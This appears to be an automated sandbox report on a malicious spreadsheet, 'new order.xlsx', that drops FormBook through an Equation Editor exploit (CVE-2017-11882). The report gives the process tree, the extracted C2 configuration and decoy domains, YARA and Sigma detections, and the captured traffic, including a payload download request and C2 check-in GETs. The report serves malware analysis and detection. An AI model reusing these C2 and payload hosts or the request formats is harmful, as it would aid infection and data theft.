Windows Analysis Report new order.xlsx

Overview

General Information

Sample Name: new order.xlsx
Analysis ID: 452636
MD5: d59accd992813d35bb00a4b3f84c4ffe
SHA1: 851d437a71d1a156e0adb9f553611865b8c90d94
SHA256: 002e54405b1ce6dd9710be53d71e832fcffc92fb63fc8ef3a37d14e0867c4c10
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2752 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2368 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2592 cmdline: 'C:\Users\Public\vbc.exe' MD5: 750919BD7E02E7821EFA1B1BD0ED4EDA)
      • vbc.exe (PID: 856 cmdline: C:\Users\Public\vbc.exe MD5: 750919BD7E02E7821EFA1B1BD0ED4EDA)
        • explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wlanext.exe (PID: 1428 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: 6F44F5C0BC6B210FE5F5A1C8D899AD0A)
            • cmd.exe (PID: 2544 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.conectaragora.com/n84e/"], "decoy": ["upscalebuyer.com", "qtict.net", "karlgillard.com", "fangsbags.com", "blackwhitebangtan.com", "lojaautomatica.com", "browbabelondon.com", "dupladocabelo.com", "tcheap3dwdshop.com", "htnmg.com", "globaltradeview.com", "instrumentwinebreathe.net", "futurejobstech.com", "notemanches.com", "myconventionalcooking.xyz", "doniang.com", "ouruiwh.com", "tecnologiatimes.com", "yxbmfc.com", "mae-baby.com", "alsiha2020.com", "zenqueue.com", "myomlineservicing.com", "justin-appel.com", "protectallfarms.com", "fairwaysxm.com", "msec-santander.com", "previem.com", "legifo.com", "reitzforrep.com", "oanicoin.com", "scorchonerecords.com", "hheiy35.com", "aurorabradfordoptometrists.com", "kailinsen.com", "ownerspreinspect.com", "instantfames.com", "wdi.technology", "compareionizers.com", "habbuhot.info", "thinking-diversity.com", "swagmansbreakfast.com", "thepegasusclub.com", "crazyhorseoutfitters.com", "flvrpodcast.com", "mz66a.com", "vineyardtrailrides.com", "khazana-bazaar.com", "m-corgroup.com", "kidsnbuds.com", "whatsprosender.com", "lundagers.com", "betterhealthdc.com", "mehtalawgroup.com", "contex33.xyz", "fastloanflorida.net", "lautaigia.net", "792argonne.com", "xtravigant.com", "anbotechsolution.com", "minipockethouse.com", "ehubo3y.com", "greaterdenver.online", "batracomputer.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      7.2.vbc.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        7.2.vbc.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.vbc.exe.400000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x158c9:$sqlite3step: 68 34 1C 7B E1
        • 0x159dc:$sqlite3step: 68 34 1C 7B E1
        • 0x158f8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
        • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
        7.2.vbc.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          7.2.vbc.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          Exploits:

          Sigma detected: EQNEDT32.EXE connecting to internet
          Source: Network Connection | Author: Joe Security | Data: DestinationIp: 103.155.80.130, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2368, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2368, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe

          System Summary:

          Sigma detected: Droppers Exploiting CVE-2017-11882
          Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2368, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2592
          Sigma detected: Execution from Suspicious Folder
          Source: Process started | Author: Florian Roth | Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2368, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2592

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe | ReversingLabs: Detection: 32%
          Source: C:\Users\Public\vbc.exe | ReversingLabs: Detection: 32%
          Multi AV Scanner detection for submitted file
          Source: new order.xlsx | Virustotal: Detection: 30%
          Source: new order.xlsx | ReversingLabs: Detection: 28%
          Yara detected FormBook
          Source: Yara match | File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2246289635.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2246311708.0000000000460000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for dropped file
          Source: C:\Users\Public\vbc.exe | Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\bin[1].exe | Joe Sandbox ML: detected
          Source: 7.2.vbc.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: vbc.exe, 00000007.00000002.2246150655.00000000002A9000.00000004.00000020.sdmp
          Source: C:\Users\Public\vbc.exe | Code function: 4x nop then pop edi | 7_2_0041568C
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop edi | 9_2_000D568C
          Source: global traffic | DNS query: name: www.thinking-diversity.com
          Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 103.155.80.130:80
          Source: excel.exe | Memory has grown: Private usage: 4MB later: 74MB

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic | Snort IDS: 2019696 ET TROJAN Possible MalDoc Payload Download Nov 11 2014 192.168.2.22:49167 -> 103.155.80.130:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor | URLs: www.conectaragora.com/n84e/
          Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Thu, 22 Jul 2021 15:11:11 GMT | Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20 | Last-Modified: Wed, 21 Jul 2021 22:09:30 GMT | ETag: "b0200-5c7a96cb69dfd" | Accept-Ranges: bytes | Content-Length: 721408 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
          Source: global traffic | HTTP traffic detected: GET /n84e/?m8ot=8pa4DPp09N0DbNR0&YP=KbrClequBVdtRHK/gZ2KmWZGYK0xt8ME2AlExBVUQacHPbAvPt6PKzpjA4rIGWPVOlDf0Q== HTTP/1.1 | Host: www.thinking-diversity.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: global traffic | HTTP traffic detected: GET /n84e/?YP=YB5mtasMUEHgcdBg3w1JzInb0sE5RwTjc/Tqop+T4aXdM6WeS8rV/Q3f3EZlzbjbZYjOJg==&m8ot=8pa4DPp09N0DbNR0 HTTP/1.1 | Host: www.globaltradeview.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
          Source: Joe Sandbox View | IP Address: 199.59.242.153
          Source: Joe Sandbox View | ASN Name: BODIS-NJUS
          Source: Joe Sandbox View | ASN Name: TWIDC-AS-APTWIDCLimitedHK
          Source: global traffic | HTTP traffic detected: GET /kung/bin.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 103.155.80.130 | Connection: Keep-Alive
          Source: unknown | TCP traffic detected without corresponding DNS query: 103.155.80.130
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\238B5502.emf
          Source: unknown | DNS traffic detected: queries for: www.thinking-diversity.com
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2218367895.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000008.00000000.2216707466.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000008.00000000.2216995609.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000008.00000000.2216995609.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000008.00000000.2212012859.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2229469649.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
